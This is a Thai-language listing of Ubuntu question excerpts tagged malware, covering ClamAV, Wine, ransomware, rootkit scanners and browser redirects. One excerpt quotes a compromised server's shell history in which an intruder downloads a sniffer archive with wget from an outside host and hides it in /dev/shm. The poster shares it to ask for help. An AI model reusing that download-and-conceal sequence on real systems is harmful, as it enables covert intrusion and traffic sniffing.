คำถามติดแท็ก malware

ฉันคิดว่าไม่จำเป็นต้องสแกนหาไวรัสใน Ubuntu หรือ Linux distros ใด ๆ จนกว่าฉันจะพบแพ็คเกจสแกนไวรัสclamtkและklamavในศูนย์ซอฟต์แวร์ Ubuntu เมื่อวานนี้ สิ่งนี้นำไปสู่คำถามต่อไปนี้: ไวรัสแตกต่างกันระหว่าง Linux และ Windows อย่างไร กลยุทธ์สำหรับการปกป้องแตกต่างกันระหว่าง Linux และ Windows อย่างไร ควรติดตั้งแพ็คเกจสแกนไวรัสในระบบของฉันหรือไม่? ถ้าเป็นเช่นนั้นซึ่งจะเป็นตัวเลือกที่ดีกว่า

223 malware  antivirus 

ฉันติดตั้งClamAVผ่านทาง Terminal ( Ctrl+ Alt+ T) ด้วย: sudo apt-get install clamav แต่ฉันจะสแกนหาไวรัสได้อย่างไร

174 security  malware  antivirus  clamav 

เมื่อเร็ว ๆ นี้เมื่อใดก็ตามที่ฉันเปิด Firefox ฉันจะได้รับข้อความในศูนย์การแจ้งเตือน มันไม่ได้เหมือนกันเสมอไปและมันก็เปลี่ยนแปลงอยู่ตลอดเวลา นี่คือตัวอย่าง: มันไม่ได้เป็นแบบนี้เสมอไป มันให้ข้อความอื่น ๆ ด้วยและเมื่อฉันคลิกมันจะส่งฉันไปยังเว็บไซต์ฟิชชิ่ง ฉันไม่รู้ว่าฉันได้รับมันอย่างไร ใครช่วยกรุณากำจัดฉันได้ไหม ฉันลองใช้โปรแกรมป้องกันไวรัสของ Clam แต่ไม่พบอะไรเลย

64 firefox  malware  antivirus 

เห็นได้ชัดว่าคุณต้องจ่ายค่าไถ่ $ 300 เพราะ ransomware ที่กำหนดเป้าหมายเป็น Microsoft Windows ได้เข้ารหัสข้อมูลของคุณ ผู้ใช้ Linux ต้องปกป้องอะไรจากขั้นตอนนี้ถ้าเช่นพวกเขากำลังใช้ไวน์ ransomware นี้มีการรายงานอย่างกว้างขวางว่าใช้เครื่องมือที่พัฒนาโดย NSA เพื่อแฮ็คเข้าสู่คอมพิวเตอร์ เครื่องมือ NSA ถูกใช้โดยกลุ่มแฮกเกอร์ที่เรียกว่าเงาโบรกเกอร์ รหัสสามารถพบได้ในGithub Microsoft เปิดตัว patch ( MS17-010 ) กับช่องโหว่นี้ในวันที่ 14 มีนาคม 2017 รายงานการติดเชื้อจำนวนมากได้เริ่มแพร่กระจายในวันที่ 14 เมษายน นี้จะกล่าวถึงที่นี่ เมื่อฉันยังไม่ได้บูท Windows 8.1 ใน 6 ถึง 8 สัปดาห์ฉันจะสามารถใช้ patch นี้จาก Ubuntu โดยไม่ต้องบูท Windows ก่อนได้ไหม (หลังจากการวิจัยอาจเป็นไปได้ว่า ClamAV …

64 windows  wine  malware 

ก่อนที่ฉันจะลบ Windows 7 ออกจากคอมพิวเตอร์ของฉันและแทนที่ด้วย Ubuntu ฉันมีภัยคุกคามมากกว่า 257 ตัวที่ไม่เคยหายไปไหน ฉันไม่รู้ว่าม้าโทรจันที่ฉันสามารถถ่ายโอนไปยัง Ubuntu ได้หรือไม่ คอมพิวเตอร์ของฉันติดไวรัสได้หรือไม่ ฉันพยายามระวังอย่างมากเมื่อฉันใช้คอมพิวเตอร์เพราะฉันไม่ต้องการรับคอมพิวเตอร์เครื่องใหม่ ฉันมี Windows 7 และพีซีของฉันเพียงไม่กี่ปี ก่อนอื่นฉันไปที่Best Buyและพวกเขาบอกว่าม้าโทรจันควรจะอยู่ในคอมพิวเตอร์ ชายคนนั้น "ดู" เท่านั้นและเนื่องจากเขาตั้งไว้ในการตั้งค่าจากโรงงานมันจึงซ่อนและขโมยพีซีของฉันสองครั้งติดต่อกัน จากนั้นฉันก็เอามันไปให้คนที่ฉันรู้จักและพวกมันก็สร้างมันขึ้นมาใหม่ แต่มันก็มีปัญหาอีกมากมาย โปรแกรมป้องกันไวรัสและโปรแกรมและไฟล์อื่น ๆ ของฉันหายไปต่อหน้าต่อตา Wi-Fi ของฉันถูกปิดและฉันไม่สามารถเปิดได้อีก มันยังปิดตัวเอง และมันไม่เคยทำแบบนั้นมาก่อน การติดเชื้อของฉันจาก Windows 7 จะถ่ายโอนไปยัง Ubuntu หรือไม่ เพิ่งจำได้ว่าฉันไม่มี windows 7 อีกต่อไปฉันมี Ubuntu เท่านั้น

50 malware 

ฉันติดตั้งclamavแล้วและต้องการอัปเดตไฟล์ที่ใช้ระบุไวรัส: $ sudo freshclam ERROR: /var/log/clamav/freshclam.log is locked by another process ERROR: Problem with internal logger (UpdateLogFile = /var/log/clamav/freshclam.log). ฉันควรทำอย่างไรกับข้อผิดพลาดนี้ แก้ไข: $ sudo lsof /var/log/clamav/freshclam.log COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME freshclam 866 clamav 3wW REG 259,1 100134 10486045 /var/log/clamav/freshclam.log

49 malware  antivirus  clamav 

ฉันได้ยินว่า Linux สามารถรับไวรัสผ่านทางไวน์ได้และฉันอยากรู้ว่าไวรัสทำงานได้เฉพาะในขณะที่ไวน์ทำงานหรือไม่ กล่าวอีกนัยหนึ่งฉันสามารถหยุดไวรัสจากการทำสิ่งนั้นได้โดยเพียงแค่เลิกไวน์หรือไม่

42 wine  malware 

สแกนโดย chkrootkit แสดงให้เห็นว่า "tcpd" เป็น INFECTED แม้ว่าการสแกนโดย rkhunter จะแสดงว่า ok (ยกเว้นผลบวกผิดปกติ) ฉันจะเป็นห่วงไหม? (ฉันใช้ Ubuntu 16.10 กับ 4.8.0-37-generic)

25 security  malware  rootkit  tcpdump  chkrootkit 

เมื่อวานนี้ฉันตรวจสอบประวัติคำสั่งของฉันใน VServer ของฉัน ฉันพบหลายสายที่น่าสงสัย 195 wget aridan.hol.es/sniffer.tgz 196 tar xvf sniffer.tgz 197 ls -a 198 rm -rf sniffer.tgz 199 rm -rf .sniff/ 200 cd /dev/shm 201 ls -a 202 mkdir " . " 203 ls -a 204 cd " . "/ 205 wget aridan.hol.es/sniffer.tgz 206 tar xvf ar 207 tar …

24 ssh  security  malware 

ฉันต้องการวิเคราะห์กล่อง Ubuntu ของฉันเพื่อตรวจสอบว่ามันถูกแฮ็กหรือไม่ คำถามของฉันคืออะไรคือสถานที่ที่จะค้นพบทั้งหมดหากมีซอฟต์แวร์ที่เป็นอันตรายเริ่มต้นขึ้น ต่อไปนี้เป็นรายการดิบบางชนิด: MBR ภาพเคอร์เนล (ฉันมี md5) / sbin / init (ฉันมี md5) โมดูลเคอร์เนลใน / etc / modules สคริปต์บริการทั้งหมดใน /etc/init.d และ / etc / init (ฉันมี md5) /etc/rc.local การทำงานอัตโนมัติของ gnome และ คำถามของฉันมีความซื่อสัตย์อย่างสมบูรณ์และไม่เป็นอันตราย เพียงเพื่อตรวจสอบว่ากล่องของฉันถูกบุกรุก

23 boot  security  malware 

ขณะนี้มีสแกนเนอร์รูทคิทเดียวที่ฉันรู้ว่าต้องติดตั้งบนเครื่องก่อนรูทคิทเพื่อให้พวกเขาสามารถเปรียบเทียบการเปลี่ยนแปลงไฟล์ ฯลฯ (เช่น: chkrootkitและrkhunter) แต่สิ่งที่ฉันต้องทำจริง ๆ ก็คือสามารถสแกนเครื่องของฉันและเครื่องอื่น ๆ จาก LiveUSB เพราะถ้ารูทคิทดีพอแล้วมันก็จะเข้ายึดโปรแกรมตรวจจับรูทคิทด้วย ดังนั้นมีสแกนเนอร์รูทคิทที่ใช้ลายเซ็นสำหรับ Ubuntu / Linux ที่ฉันสามารถติดตั้งบน LiveUSB และใช้ในการสแกนเครื่องที่น่าเชื่อถือที่ฉันเสียบเข้าโดยไม่ต้องตรวจสอบพฤติกรรมหรือเปรียบเทียบไฟล์จากวันที่ผ่านมาหรือไม่

20 software-recommendation  security  malware  rootkit  signature 

ญาติของฉันเพิ่งส่งอีเมลถึงฉัน เมื่อเร็ว ๆ นี้เขาได้พบกับหัวหน้าที่น่าตกใจจากผู้จำหน่ายแอนตี้ไวรัส ESET: KillDisk กำหนดเป้าหมายเป็น Linux: เรียกค่าไถ่ $ 250K แต่ไม่สามารถถอดรหัสได้ อีเมลจะอธิบายชิ้นส่วนของซอฟต์แวร์ที่เข้ารหัสเนื้อหาของดิสก์และเรียกร้องค่าไถ่ ญาติของฉันตื่นตระหนกและรู้สึกว่าจำเป็นต้องมีโปรแกรมป้องกันไวรัส ฉันรู้สึกอย่างยิ่งว่าไม่จำเป็นต้องมีโปรแกรมป้องกันไวรัสใน Ubuntu แต่ฉันรู้สึกว่าการป้องกันที่ดีที่สุดสำหรับผู้ใช้ Ubuntu คือการติดตั้งอัปเดตความปลอดภัยทันทีเพื่อสำรองข้อมูลปกติและติดตั้งซอฟต์แวร์จากแหล่งที่เชื่อถือได้เช่น Ubuntu Software Center คำแนะนำนั้นล้าสมัยแล้วหรือไม่กับการมาถึงของ KillDisk?

19 security  malware  antivirus 

ฉันกำลังถูกนำไปยังเว็บไซต์ " http://domain-error.com " สิ่งนี้เกิดขึ้นใน Firefox, Chromium, Google chrome เป็นต้นฉันรู้สึกว่าถูกโจมตีจากไวรัสหรืออะไรทำนองนั้น อัปเดต: การเปลี่ยนเส้นทางเกิดขึ้นค่อนข้างบ่อย แต่ไม่เสมอไปและกำลังประสบกับเบราว์เซอร์ทั้งหมด ตัวจัดการ Firefox Add-ons แสดง "อูบุนตูดัดแปลง 3.2 (ปิดใช้งาน)" ปลั๊กอินของ Firefox แสดง "Codec OpenH264 วิดีโอที่จัดทำโดย Cisco Systems, Inc.1.5.1" /etc/hostsมีดังนี้: 127.0.0.1 localhost 127.0.1.1 home-desktop # The following lines are desirable for IPv6 capable hosts ::1 ip6-localhost ip6-loopback fe00::0 ip6-localnet ff00::0 …

19 networking  malware 

ในฐานะผู้ใช้ Ubuntu คำแนะนำใด ๆ เกี่ยวกับวิธี Linux.Darlloz อาจส่งผลกระทบต่อ Ubuntu และวิธีป้องกันได้อย่างไร

18 malware 

นี่มันแปลก วันนี้ฉันเปิดไฟล์ excel ด้วย LibreOffice ทันใดนั้นฉันเห็นเมาส์เปลี่ยนสีและติดอยู่กับข้อความในภาษาอาหรับซึ่งเปลี่ยนทุกวินาทีในการวนซ้ำ ฉันสามารถอ่านภาษาอาหรับได้จริงดังนั้นฉันจึงจำได้ทันทีว่าเป็นข้อความอิสลามที่ยกย่องอัลเลาะห์ (รวมถึงTakbir ) นี่คือภาพหน้าจอ: ตอนแรกฉันคิดว่านี่เป็นสิ่งที่มีไฟล์ แต่จากนั้นฉันเห็นว่าสิ่งนี้เกิดขึ้นกับโปรแกรม LibreOffice ใด ๆ (แต่เฉพาะโปรแกรม LibreOffice) และแม้กระทั่งเมื่อพวกเขาเปิดอยู่มันจะเปลี่ยนเมาส์เมื่อมันอยู่เหนือโปรแกรม LibreOffice เท่านั้น และกลับสู่ปกติทุกที่อื่น ยังติดตั้งใหม่ไม่ได้ ฉันพยายามเรียกใช้ updater ของซอฟต์แวร์ - แต่ฉันมีข้อผิดพลาดที่ไม่สามารถโหลดที่เก็บข้อมูลของ Steam ได้ แต่ดูเหมือนว่าเป็นเรื่องบังเอิญ: Failed to fetch http://repo.steampowered.com/steam/dists/precise/steam/i18n/Translation-en_US Failed to fetch http://repo.steampowered.com/steam/dists/precise/steam/i18n/Translation-en นี่เป็นคำใบ้อีกข้อ - ฉันลองถ่ายภาพหน้าจอหลายข้อความหลายข้อความ แต่พวกเขาทั้งหมดแสดงข้อความเดียวกัน (ข้อความด้านบน) หวังว่านั่นหมายความว่าอะไร ฉันควรทราบว่าฉันยังไม่ได้ติดตั้งอะไรเลยเมื่อเร็ว ๆ นี้และฉันแทบจะไม่เคยใช้ LibreOffice เลย (ฉันชอบ …

17 libreoffice  malware